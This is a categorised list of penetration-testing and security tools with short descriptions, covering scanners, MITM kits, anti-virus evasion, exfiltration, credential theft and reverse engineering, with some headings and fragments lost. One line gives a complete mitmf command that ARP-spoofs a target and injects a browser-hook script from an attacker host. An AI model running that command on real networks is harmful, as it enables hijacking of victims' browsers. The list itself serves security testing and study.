- Penetration Testing OS Distributions
- Multi-paradigm Frameworks
- Network Vulnerability scanners
- Network Tools
- Wireless Network Tools
- Transport Layer Security Tools
- Web Exploitation
- Hex Editors
- File Format Analysis Tools
- Anti-virus Evasion Tools
- Hash Cracking Tools
- Windows Utilities
- GNU/Linux Utilities
- macOS Utilities
- Social Engineering Tools
- OSINT Tools
- Anonymity Tools
- Reverse Engineering Tools
- Side-channel Tools
Penetration Testing OS Distributions
- Parrot Security OS - Distribution similar to Kali using the same repositories, but with additional features such as Tor and I2P integration.
- Kali - GNU/Linux distribution designed for digital forensics and penetration testing.
- Metasploit - Software for offensive security teams to help verify vulnerabilities and manage security assessments.
- Armitage - Java-based GUI front-end for the Metasploit Framework.
- Faraday - Multiuser integrated pentesting environment for red teams performing cooperative penetration tests, security audits, and risk assessments.
Network Vulnerability Scanners
- OpenVAS - Open source implementation of the popular Nessus vulnerability assessment system.
- Nexpose - Commercial vulnerability and risk management assessment engine that integrates with Metasploit, sold by Rapid7.
- OWASP Dependency Check - Open source static analysis tool that enumerates dependencies used by Java and .NET software code (with experimental support for Python, Ruby, Node.js, C, and C++) and lists security vulnerabilities associated with the depedencies.
- VisualCodeGrepper - Open source static code analysis tool with support for Java, C, C++, C#, PL/SQL, VB, and PHP. VisualCodeGrepper also conforms to OWASP best practices.
- Brakeman - Static analysis security vulnerability scanner for Ruby on Rails applications.
- cppcheck - Extensible C/C++ static analyzer focused on finding bugs.
- FindBugs - Free software static analyzer to look for bugs in Java code.
- sobelow - Security-focused static analysis for the Phoenix Framework.
- bandit - Security oriented static analyser for python code.
- Progpilot - Static security analysis tool for PHP code.
- ShellCheck - Static code analysis tool for shell script.
- Codebeat (open source) - Open source implementation of commercial static code analysis tool with GitHub integration.
- truffleHog - Git repo scanner.
Web Vulnerability Scanners
- Netsparker Web Application Security Scanner - Commercial web application security scanner to automatically find many different types of security flaws.
- OWASP Zed Attack Proxy (ZAP) - Feature-rich, scriptable HTTP intercepting proxy and fuzzer for penetration testing web applications.
- Nikto - Noisy but fast black box web server and web application vulnerability scanner.
- WPScan - Black box WordPress vulnerability scanner.
- cms-explorer - Reveal the specific modules, plugins, components and themes that various websites powered by content management systems are running.
- ACSTIS - Automated client-side template injection (sandbox escape/bypass) detection for AngularJS.
- SQLmate - A friend of sqlmap that identifies sqli vulnerabilities based on a given dork and website (optional).
- ASafaWeb - Free online web vulnerability scanner.
- pig - GNU/Linux packet crafting tool.
- Network-Tools.com - Website offering an interface to numerous basic network utilities like
whois, and more.
- Intercepter-NG - Multifunctional network toolkit.
- Legion - Graphical interface offering scriptable, configurable access to existing network infrastructure scanning and enumeration tools.
- dsniff - Collection of tools for network auditing and pentesting.
- scapy - Python-based interactive packet manipulation program & library.
- Printer Exploitation Toolkit (PRET) - Tool for printer security testing capable of IP and USB connectivity, fuzzing, and exploitation of PostScript, PJL, and PCL printer language features.
- Praeda - Automated multi-function printer data harvester for gathering usable data during security assessments.
- routersploit - Open source exploitation framework similar to Metasploit but dedicated to embedded devices.
- impacket - Collection of Python classes for working with network protocols.
- dnstwist - Domain name permutation engine for detecting typo squatting, phishing and corporate espionage.
- THC Hydra - Online password cracking tool with built-in support for many network protocols, including HTTP, SMB, FTP, telnet, ICQ, MySQL, LDAP, IMAP, VNC, and more.
- Ncat - TCP/IP command line utility supporting multiple protocols.
- HTTPTunnel - Tunnel data over pure HTTP GET/POST requests.
- Data Exfiltration Toolkit (DET) - Proof of concept to perform data exfiltration using either single or multiple channel(s) at the same time.
- pwnat - Punches holes in firewalls and NATs.
- tgcd - Simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls.
- Iodine - Tunnel IPv4 data through a DNS server; useful for exfiltration from networks where Internet access is firewalled, but DNS queries are allowed.
- PassHunt - Search file systems for passwords.
- PANHunt - Search file systems for credit cards.
Network Reconnaissance Tools
- Shodan - Database containing information on all accessible domains on the internet obtained from passive scanning.
- pyShodan - Python 3 script for interacting with Shodan API (requires valid API key).
- zmap - Open source network scanner that enables researchers to easily perform Internet-wide network studies.
- nmap - Free security scanner for network exploration & security audits.
- Netdiscover - Simple and quick network scanning tool.
- xprobe2 - Open source operating system fingerprinting tool.
- CloudFail - Unmask server IP addresses hidden behind Cloudflare by searching old database records and detecting misconfigured DNS.
- Mass Scan - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
- smbmap - Handy SMB enumeration tool.
- LdapMiner - Multiplatform LDAP enumeration utility.
- ldapsearch - Linux command line utility for querying LDAP servers.
- ACLight - Script for advanced discovery of sensitive Privileged Accounts - includes Shadow Admins.
- Pentest-Tools - Online suite of various different pentest related tools.
Protocol Analyzers and Sniffers
- tcpdump/libpcap - Common packet analyzer that runs under the command line.
- Wireshark - Widely-used graphical, cross-platform network protocol analyzer.
- Yersinia - Packet and protocol analyzer with MITM capability.
- Fiddler - Cross platform packet capturing tool for capturing HTTP/HTTPS traffic.
- netsniff-ng - Swiss army knife for for network sniffing.
- Dshell - Network forensic analysis framework.
Proxies and MITM Tools
- Responder - Open source NBT-NS, LLMNR, and MDNS poisoner.
- Responder-Windows - Windows version of the above NBT-NS/LLMNR/MDNS poisoner.
- MITMf - Multipurpose man-in-the-middle framework.
mitmf --arp --spoof -i eth0 --gateway 192.168.1.1 --targets 192.168.1.20 --inject --js-url http://192.168.1.137:3000/hook.js
- dnschef - Highly configurable DNS proxy for pentesters.
- mitmproxy - Interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.
- Morpheus - Automated ettercap TCP/IP Hijacking tool.
- mallory - HTTP/HTTPS proxy over SSH.
- SSH MITM - Intercept SSH connections with a proxy; all plaintext passwords and sessions are logged to disk.
- evilgrade - Modular framework to take advantage of poor upgrade implementations by injecting fake updates.
- Ettercap - Comprehensive, mature suite for machine-in-the-middle attacks.
- BetterCAP - Modular, portable and easily extensible MITM framework.
Wireless Network Tools
- Aircrack-ng - Set of tools for auditing wireless networks.
- Wifite - Automated wireless attack tool.
- wifi-pickle - Fake access point attacks.
- MANA Toolkit - Rogue AP and man-in-the-middle utility.
- Fluxion - Suite of automated social engineering based WPA attacks.
Transport Layer Security Tools
- tlssled - Comprehensive TLS/SSL testing suite.
- SSLyze - Fast and comprehensive TLS/SSL configuration analyzer to help identify security mis-configurations.
- SSL Labs - Online TLS/SSL testing suite for revealing supported TLS/SSL versions and ciphers.
- crackpkcs12 - Multithreaded program to crack PKCS#12 files (
.pfxextensions), such as TLS/SSL certificates.
- Browser Exploitation Framework (BeEF) - Command and control server for delivering exploits to commandeered Web browsers.
- Wordpress Exploit Framework - Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
- WPSploit - Exploit WordPress-powered websites with Metasploit.
- SQLmap - Automated SQL injection and database takeover tool.
- sqlninja - Automated SQL injection and database takeover tool.
- tplmap - Automatic server-side template injection and Web server takeover tool.
- weevely3 - Weaponized web shell.
- wafw00f - Identifies and fingerprints Web Application Firewall (WAF) products.
- fimap - Find, prepare, audit, exploit and even Google automatically for LFI/RFI bugs.
- Kadabra - Automatic LFI exploiter and scanner.
- Kadimus - LFI scan and exploit tool.
- liffy - LFI exploitation tool.
- Commix - Automated all-in-one operating system command injection and exploitation tool.
- sslstrip - Demonstration of the HTTPS stripping attacks.
- sslstrip2 - SSLStrip version to defeat HSTS.
- NoSQLmap - Automatic NoSQL injection and database takeover tool.
- VHostScan - A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, aliases and dynamic default pages.
- FuzzDB - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
- EyeWitness - Tool to take screenshots of websites, provide some server header info, and identify default credentials if possible.
- webscreenshot - A simple script to take screenshots of list of websites.
- IIS-Shortname-Scanner - Command line tool to exploit the Windows IIS tilde information disclosure vulnerability.
- HexEdit.js - Browser-based hex editing.
- Hexinator - World's finest (proprietary, commercial) Hex Editor.
- Frhed - Binary file editor for Windows.
- Cheat Engine - Memory debugger and hex editor for running applications.
File Format Analysis Tools
- Veles - Binary data visualization and analysis tool.
- Hachoir - Python library to view and edit a binary stream as tree of fields and tools for metadata extraction.
Anti-virus Evasion Tools
- shellsploit - Generates custom shellcode, backdoors, injectors, optionally obfuscates every byte via encoders.
- Hyperion - Runtime encryptor for 32-bit portable executables ("PE
- AntiVirus Evasion Tool (AVET) - Post-process exploits containing executable files targeted for Windows machines to avoid being recognized by antivirus software.
- peCloak.py - Automates the process of hiding a malicious Windows executable from antivirus (AV) detection.
- peCloakCapstone - Multi-platform fork of the peCloak.py automated malware antivirus evasion tool.
- UniByAv - Simple obfuscator that takes raw shellcode and generates Anti-Virus friendly executables by using a brute-forcable, 32-bit XOR key.
- Shellter - Dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
Hash Cracking Tools
- Hashcat - Fast hash cracking utility with support for most known hashes as well as OpenCL and CUDA acceleration.
- John the Ripper - Fast password cracker.
- CeWL - Generates custom wordlists by spidering a target's website and collecting unique words.
- JWT Cracker - Simple HS256 JWT token brute force cracker.
- Rar Crack - RAR bruteforce cracker.
- Sysinternals Suite - The Sysinternals Troubleshooting Utilities.
- PowerSploit - PowerShell Post-Exploitation Framework.
- Headstart - Lazy man's Windows privilege escalation tool utilizing PowerSploit.
- mimikatz - Credentials extraction tool for Windows operating system.
- Windows Credentials Editor - Inspect logon sessions and add, change, list, and delete associated credentials, including Kerberos tickets.
- Bloodhound - Graphical Active Directory trust relationship explorer.
- Empire - Pure PowerShell post-exploitation agent.
- Fibratus - Tool for exploration and tracing of the Windows kernel.
- redsnarf - Post-exploitation tool for retrieving password hashes and credentials from Windows workstations, servers, and domain controllers.
- Magic Unicorn - Shellcode generator for numerous attack vectors, including Microsoft Office macros, PowerShell, HTML applications (HTA), or
certutil(using fake certificates).
- DeathStar - Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments.
- Hyena - NetBIOS exploitation tool.
- Linux Exploit Suggester - Heuristic reporting on potentially viable exploits for a given GNU/Linux system.
- Linus - Security auditing tool for Linux and macOS.
- Bella - Pure Python post-exploitation data mining and remote administration tool for macOS.
- Linus - Security auditing tool for Linux and macOS.
Social Engineering Tools
- GoVanguard/list-socialengineering-resources - GoVanguard's list of social engineering resources.
- Shodan - World's first search engine for Internet-connected devices.
- pyShodan - Python 3 script for interacting with Shodan API (requires valid API key).
- Maltego - Proprietary software for open source intelligence and forensics, from Paterva.
- Mxtoolbox - Email domain and DNS lookup.
- Robtex - Domain and IP address lookup.
- theHarvester - E-mail, subdomain and people names harvester.
- DNSDumpster - Online DNS recon and search service.
- dnsenum - Perl script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results.
- dnsmap - Passive DNS network mapper.
- dnsrecon - DNS enumeration script.
- dnstracer - Determines where a given DNS server gets its information from, and follows the chain of DNS servers.
- passivedns-client - Library and query tool for querying several passive DNS providers.
- passivedns - Network sniffer that logs all DNS server replies for use in a passive DNS setup.
- creepy - Geolocation OSINT tool.
- Google Hacking Database - Database of Google dorks; can be used for recon.
- GooDork - Command line Google dorking tool.
- dork-cli - Command line Google dork tool.
- Censys - Collects data on hosts and websites through daily ZMap and ZGrab scans.
- recon-ng - Full-featured Web Reconnaissance framework written in Python.
- github-dorks - CLI tool to scan github repos/organizations for potential sensitive information leak.
- vcsmap - Plugin-based tool to scan public version control systems for sensitive information.
- Spiderfoot - Open source OSINT automation tool with a Web UI and report visualizations
- Threat Crowd - Search engine for threats.
- Virus Total - Free service that analyzes suspicious files and URLs and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware.
- PacketTotal - Simple, free, high-quality packet capture file analysis facilitating the quick detection of network-borne malware (using Bro and Suricata IDS signatures under the hood).
- gOSINT - OSINT tool with multiple modules and a telegram scraper.
- Amass - Subdomain enumeration via scraping, web archives, brute forcing, permutations, reverse DNS sweeping, TLS certificates, passive DNS data sources, etc.
- XRay - XRay is a tool for recon, mapping and OSINT gathering from public networks.
- Intel Techniques Online Tools - Use the links to the left to access all of the custom search tools.
- Tor - Free software and onion routed overlay network that helps you defend against traffic analysis.
- I2P - The Invisible Internet Project.
- OnionScan - Tool for investigating the Dark Web by finding operational security issues introduced by Tor hidden service operators.
- What Every Browser Knows About You - Comprehensive detection page to test your own Web browser's configuration for privacy and identity leaks.
Reverse Engineering Tools
- VirusTotal - Online malware scanner.
- Hybrid Analysis - Online malware scanner.
- Interactive Disassembler (IDA Pro) - Proprietary multi-processor disassembler and debugger for Windows, GNU/Linux, or macOS; also has a free version, IDA Free.
- WDK/WinDbg - Windows Driver Kit and WinDbg.
- OllyDbg - x86 debugger for Windows binaries that emphasizes binary code analysis.
- Radare2 - Open source, crossplatform reverse engineering framework.
- x64dbg - Open source x64/x32 debugger for windows.
- Immunity Debugger - Powerful way to write exploits and analyze malware.
- Evan's Debugger - OllyDbg-like debugger for GNU/Linux.
- Medusa - Open source, cross-platform interactive disassembler.
- plasma - Interactive disassembler for x86/ARM/MIPS. Generates indented pseudo-code with colored syntax code.
- peda - Python Exploit Development Assistance for GDB.
- dnSpy - Tool to reverse engineer .NET assemblies.
- binwalk - Fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.
- PyREBox - Python scriptable Reverse Engineering sandbox by Cisco-Talos.
- Voltron - Extensible debugger UI toolkit written in Python.
- Capstone - Lightweight multi-platform, multi-architecture disassembly framework.
- rVMI - Debugger on steroids; inspect userspace processes, kernel drivers, and preboot environments in a single tool.
- ChipWhisperer - Complete open-source toolchain for side-channel power analysis and glitching attacks.
This work is licensed under a Creative Commons Attribution 4.0 International License.